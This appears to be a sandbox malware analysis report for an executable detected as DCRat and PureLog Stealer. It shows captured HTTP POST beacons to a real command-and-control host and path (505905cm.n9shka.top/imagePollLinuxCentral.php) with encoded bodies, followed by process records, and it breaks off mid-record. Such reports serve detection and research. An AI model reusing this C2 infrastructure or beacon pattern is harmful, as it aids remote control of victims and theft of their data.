Jan 8, 2025 19:22:49.359955072 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 19:22:49.706486940 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:22:49 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Jan 8, 2025 19:22:49.707182884 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:22:49 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
5 | 192.168.2.4 | 49753 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 19:22:58.155389071 CET | 332 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 336
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
Jan 8, 2025 19:22:58.501976013 CET | 336 | OUT | Data Raw: 00 04 01 07 06 0b 01 00 05 06 02 01 02 05 01 06 00 03 05 09 02 0c 03 0a 07 05 0e 00 06 01 06 08 0c 07 03 0c 07 04 05 02 0c 06 07 56 05 07 05 54 05 0a 0c 59 0c 57 05 52 07 02 06 03 07 01 07 0a 00 54 0f 00 06 02 01 04 0d 0f 0d 57 0f 07 0c 53 04 06
                                                                          Data Ascii: VTYWRTWSQS\L~A|ci]c[qLa\tBk|r_`RRL|`tlosH{^e^SpCwIs[e~V@x}r}_y
Jan 8, 2025 19:22:58.784297943 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 19:22:58.917509079 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:22:58 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
6 | 192.168.2.4 | 49769 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 19:23:01.117084026 CET | 332 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
Jan 8, 2025 19:23:01.470721006 CET | 344 | OUT | Data Raw: 00 00 04 05 06 00 04 02 05 06 02 01 02 07 01 07 00 06 05 0b 02 02 03 0f 02 0e 0c 02 06 01 01 07 0d 56 06 0c 03 07 07 02 0b 01 06 53 04 0a 04 03 04 07 0e 0e 0f 07 06 07 06 57 06 03 07 52 05 5c 05 01 0c 00 06 0f 01 00 0c 05 0e 52 0d 04 0c 51 06 01
                                                                          Data Ascii: VSWR\RQZX\L~@^b@`Lab\tA|ob_wRc^|MpJ{BxNzJkSR@cdw_~_~V@A{}bL~\S
Jan 8, 2025 19:23:01.745446920 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 19:23:01.873406887 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:01 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          7 | 192.168.2.4 | 49805 | 37.44.238.250 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 8, 2025 19:23:08.411525965 CET | 332 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:23:08.767712116 CET344OUTData Raw: 05 06 01 00 06 09 01 04 05 06 02 01 02 03 01 03 00 03 05 00 02 02 03 01 03 0e 0c 0d 06 55 02 05 0d 00 04 0a 01 07 06 56 0e 0a 02 06 06 00 02 00 07 02 0d 0e 0c 02 07 52 06 04 06 03 01 0a 07 0e 03 07 0a 0f 05 00 05 09 0c 05 0b 07 0f 56 0d 04 06 54
                                                                          Data Ascii: UVRVTUW\L~ChcztLzXaQ~jYv||Bkcpy|QopzKknkR`IQ[ie~V@x}v~\[
                                                                          Jan 8, 2025 19:23:09.060656071 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:23:09.193443060 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:09 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          8 | 192.168.2.4 | 49826 | 37.44.238.250 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 8, 2025 19:23:11.698177099 CET | 332 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:23:12.048922062 CET344OUTData Raw: 00 01 04 00 06 08 04 02 05 06 02 01 02 06 01 04 00 03 05 00 02 05 03 00 00 01 0f 0d 07 04 01 07 0c 56 03 0c 01 03 05 00 0f 02 04 0a 00 02 05 52 04 53 0c 0f 0d 01 06 0b 07 0f 06 03 06 56 04 0f 02 01 0d 0c 05 0e 01 07 0c 00 0e 05 0f 03 0e 51 07 57
                                                                          Data Ascii: VRSVQWU\L}Pz`[rXueQQawl~sZlRQl`aZTkU`d\}e~V@B{Cv}bW
                                                                          Jan 8, 2025 19:23:12.346187115 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:23:12.477238894 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:12 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          9 | 192.168.2.4 | 49841 | 37.44.238.250 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 8, 2025 19:23:14.812264919 CET | 315 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:23:15.158229113 CET344OUTData Raw: 00 03 01 01 06 0f 04 01 05 06 02 01 02 07 01 03 00 04 05 09 02 0d 03 00 02 56 0e 01 06 02 01 55 0d 0f 06 0a 00 51 07 52 0f 01 05 04 07 53 05 05 06 54 0e 0c 0c 0f 07 52 05 0e 05 01 06 57 05 0b 00 53 0c 0b 07 05 04 53 0b 0f 0f 00 0f 53 0e 56 05 0d
                                                                          Data Ascii: VUQRSTRWSSSVPZR\L~|Yb`bialOk|WMcRZO|s^ol]laZkm`wtlO}O~V@Ax}TNbW
                                                                          Jan 8, 2025 19:23:15.442372084 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:23:15.569325924 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:15 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          10 | 192.168.2.4 | 49856 | 37.44.238.250 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 8, 2025 19:23:17.650572062 CET | 332 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:23:18.001960039 CET344OUTData Raw: 05 07 04 02 03 0d 01 0a 05 06 02 01 02 06 01 02 00 06 05 09 02 03 03 00 01 06 0e 0d 03 03 00 07 0d 51 06 5b 03 54 06 06 0b 0a 07 06 04 04 02 02 06 01 0c 5b 0a 02 05 01 07 00 07 06 05 01 05 0f 00 01 0d 01 07 51 06 04 0f 0e 0c 07 0f 51 0d 07 06 54
                                                                          Data Ascii: Q[T[QQTQV\L}Q~`a^wa}Lwv|AucUw]||xl`^{YzIkT`C`gxu~V@BxmbN~LW
                                                                          Jan 8, 2025 19:23:19.060506105 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:23:19.060866117 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:18 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                          Jan 8, 2025 19:23:19.060914040 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:18 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                          Jan 8, 2025 19:23:19.061033964 CET | 401 | IN | HTTP/1.1 100 Continue
                                                                          Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:23:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-alive<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          11 | 192.168.2.4 | 49998 | 37.44.238.250 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 8, 2025 19:23:45.139482975 CET | 332 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:23:45.486376047 CET344OUTData Raw: 00 00 04 05 06 00 04 02 05 06 02 01 02 07 01 07 00 06 05 0b 02 02 03 0f 02 0e 0c 02 06 01 01 07 0d 56 06 0c 03 07 07 02 0b 01 06 53 04 0a 04 03 04 07 0e 0e 0f 07 06 07 06 57 06 03 07 52 05 5c 05 01 0c 00 06 0f 01 00 0c 05 0e 52 0d 04 0c 51 06 01
                                                                          Data Ascii: VSWR\RQZX\L~@^b@`Lab\tA|ob_wRc^|MpJ{BxNzJkSR@cdw_~_~V@A{}bL~\S
                                                                          Jan 8, 2025 19:23:45.799418926 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:23:45.937529087 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:45 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          12 | 192.168.2.4 | 50016 | 37.44.238.250 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 8, 2025 19:23:53.866105080 CET | 332 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:23:54.220882893 CET344OUTData Raw: 00 00 01 07 03 0a 01 04 05 06 02 01 02 0d 01 03 00 01 05 0e 02 01 03 0f 01 03 0e 0d 03 04 03 07 0c 56 06 0f 07 01 03 0b 0e 54 02 04 05 57 07 05 06 50 0c 09 0d 05 05 06 01 0e 03 06 06 57 05 5d 02 05 0e 00 06 56 07 09 0c 52 0e 07 0e 0d 0f 04 02 01
                                                                          Data Ascii: VTWPW]VR[ZRU\L~C|bvryBu[x|it|`lxll[lbJ}kQtIRj_~V@x}~~bS
                                                                          Jan 8, 2025 19:23:54.503763914 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:23:54.634469032 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:54 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          13 | 192.168.2.4 | 50017 | 37.44.238.250 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 8, 2025 19:23:57.387593985 CET | 332 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:23:57.740959883 CET344OUTData Raw: 05 06 01 00 06 00 01 02 05 06 02 01 02 01 01 05 00 02 05 0b 02 06 03 0d 07 00 0f 00 05 0f 00 09 0c 0f 07 0f 07 02 04 01 0d 0b 07 51 07 01 05 0f 07 02 0b 0c 0f 05 04 57 06 50 05 06 07 0b 04 0f 01 02 0d 0c 04 0f 05 06 0f 06 0c 01 0a 00 0e 51 05 54
                                                                          Data Ascii: QWPQTQ\L}PhNrwrn\wfcUUyw||`Xlo{o^PkmwP`^p}u~V@{SrL}\e
                                                                          Jan 8, 2025 19:23:58.040276051 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:23:58.173022985 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:58 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                          Jan 8, 2025 19:23:58.390559912 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:23:58 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                          14 | 192.168.2.4 | 50018 | 37.44.238.250 | 80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 8, 2025 19:24:01.458509922 CET | 332 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:24:01.814564943 CET344OUTData Raw: 05 07 04 01 06 0c 04 05 05 06 02 01 02 0c 01 06 00 0a 05 0e 02 03 03 0b 00 06 0e 02 07 57 02 02 0c 05 04 0c 01 04 06 0b 0d 07 04 0b 06 00 04 05 03 03 0d 0e 0d 05 07 06 04 05 07 07 06 04 07 0a 02 00 0f 01 07 01 06 07 0f 0e 0f 00 0d 07 0c 54 06 01
                                                                          Data Ascii: WTU\L~Nh`bMvqiBbu{U|RuvltBc{^{o{o^bIn`C`Il}_~V@{m\~L}
                                                                          Jan 8, 2025 19:24:02.124489069 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:24:02.258925915 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:24:02 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session ID:15
                                                                          Source IP:192.168.2.4
                                                                          Source Port:50019
                                                                          Destination IP:37.44.238.250
                                                                          Destination Port:80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 8, 2025 19:24:19.926120043 CET | 332 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:24:20.283421993 CET | 344 | OUT | [encoded request body]
                                                                          Jan 8, 2025 19:24:20.554718971 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:24:20.685286999 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:24:20 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
                                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session ID:16
                                                                          Source IP:192.168.2.4
                                                                          Source Port:50020
                                                                          Destination IP:37.44.238.250
                                                                          Destination Port:80
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 8, 2025 19:24:30.993206024 CET | 332 | OUT | POST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:24:31.345933914 CET | 344 | OUT | [encoded request body]
                                                                          Jan 8, 2025 19:24:31.692440033 CET | 25 | IN | HTTP/1.1 100 Continue



                                                                          Target ID:0
                                                                          Start time:13:21:54
                                                                          Start date:08/01/2025
                                                                          Path:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                                          Imagebase:0x60000
                                                                          File size:1'917'440 bytes
                                                                          MD5 hash:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1808136284.000000001263C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1660573401.0000000000062000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:13:21:57
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline"
                                                                          Imagebase:0x7ff65a8e0000
                                                                          File size:2'759'232 bytes
                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:13:21:57
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:13:21:57
                                                                          Start date:08/01/2025
                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                          Wow64 process (32bit):false
